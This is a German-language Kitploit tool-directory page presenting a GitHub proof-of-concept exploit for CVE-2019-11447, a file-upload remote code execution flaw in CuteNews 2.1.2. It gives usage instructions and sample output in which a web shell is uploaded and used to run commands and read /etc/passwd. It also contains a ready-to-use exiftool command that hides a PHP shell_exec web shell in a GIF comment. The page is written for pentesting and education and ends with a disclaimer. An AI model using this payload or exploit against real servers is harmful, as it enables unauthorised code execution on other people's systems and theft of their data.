Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-11447-POC — CuteNews 2.1.2 - CVE-2019-11447 Proof-of-Concept | Kitploit
Tools/GitHubGitHub/crfslick/cve-2019-11447-poc
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubcrfslick/cve-2019-11447-poc

CVE-2019-11447-POC

CuteNews 2.1.2 - CVE-2019-11447 Proof-of-Concept

Repository anzeigen
12vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

sadnews

CuteNews 2.1.2 - CVE-2019-11447 Proof-of-Concept

POC von CRFSlick, entdeckt von AkkuS <Özkan Mustafa Akkuş>

In CutePHP CuteNews 2.1.2 wurde ein Problem entdeckt. Ein Angreifer kann über den Avatar-Upload-Prozess im Profilbereich mittels des Feldes avatar_file in index.php?mod=main&opt=personal auf den Server eindringen. Es gibt keine effektive Kontrolle von $imgsize in /core/modules/dashboard.php. Der Header-Inhalt einer Datei kann geändert und die Kontrolle zur Codeausführung umgangen werden. (Ein Angreifer kann hierfür den GIF-Header verwenden.)

Verwendung

root@kitploit:~
Usage:
	CVE-2019-1144.py <username> <password> <base uri / login page>
Example:
	CVE-2019-1144.py admin p4ssw0rd http://192.168.1.19/CuteNews/index.php
root@kitploit:~
┌──(slick㉿kali)-[~/CVE-2019-11447-POC]
└─$ python3 CVE-2019-11447.py admin p4ssw0rd http://192.168.1.19/CuteNews/index.php
-.-. --- --- .-..    .... ....- -..- --- .-.    -... .- -. -. . .-.
[*] Detected version 'CuteNews 2.1.2'
[*] Grabbing session cookie
[*] Logging in as admin:p4ssw0rd
[+] Login Success!
[*] Grabbing __signature_key and __signature_dsi needed for pofile update request
[+] __signature_key: 45ad06a9fc89f75e7ef046a11079c33d-admin
[+] __signature_dsi: 71e41d6500f2dc51d0606f64539f84b1
[*] Uploading evil avatar... Done!
[*] Validating that the file was uploaded... Yup!
[+] http://192.168.1.19/CuteNews/uploads/avatar_admin_5629.php?cmd=<cmd>
[*] Looks like everything went smoothly, lets see if we have RCE!
[*] Keep in mind that this shell is limited, no STDERR

$> whoami
www-data

$> cat /etc/passwd
root:x:0:0:root:/root:/root/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
Tool herunterladen

Böses GIF

Das böse GIF wurde aus dem Internet geholt und dann mit exiftool modifiziert, um den benötigten PHP-Code einzufügen.

root@kitploit:~
┌──(slick㉿kali)-[~/CVE-2019-11447-POC]
└─$ exiftool -Comment='<?php echo "'"\n\ndGhpc3dlYnNoZWxsb3V0cHV0c3RhcnRzaGVyZQ==\n\n\n"'"; echo shell_exec($_GET["'"cmd"'"]); echo "'"\n\ndGhpc3dlYnNoZWxsb3V0cHV0ZW5kc2hlcmU=\n\n"'";?>' sad.gif

Exiftool zeigt die Metadaten des Bildes an, in denen sich der eingefügte PHP-Code im Kommentar befindet.

root@kitploit:~
┌──(slick㉿kali)-[~/CVE-2019-11447-POC]
└─$ exiftool sad.gif
ExifTool Version Number         : 12.05
File Name                       : sad.gif
...
Comment                         : <?php echo "\n\ndGhpc3dlYnNoZWxsb3V0cHV0c3R...

Quellen

  • https://nvd.nist.gov/vuln/detail/CVE-2019-11447
  • http://pentest.com.tr/exploits/CuteNews-2-1-2-Remote-Code-Execution-Metasploit.html

Haftungsausschluss

Dieses Projekt ist ausschließlich für Bildungszwecke gedacht und darf nicht für Gesetzesverstöße oder persönlichen Gewinn genutzt werden. Der Autor dieses Projekts übernimmt keine Verantwortung für etwaige Schäden, die durch das Material verursacht werden.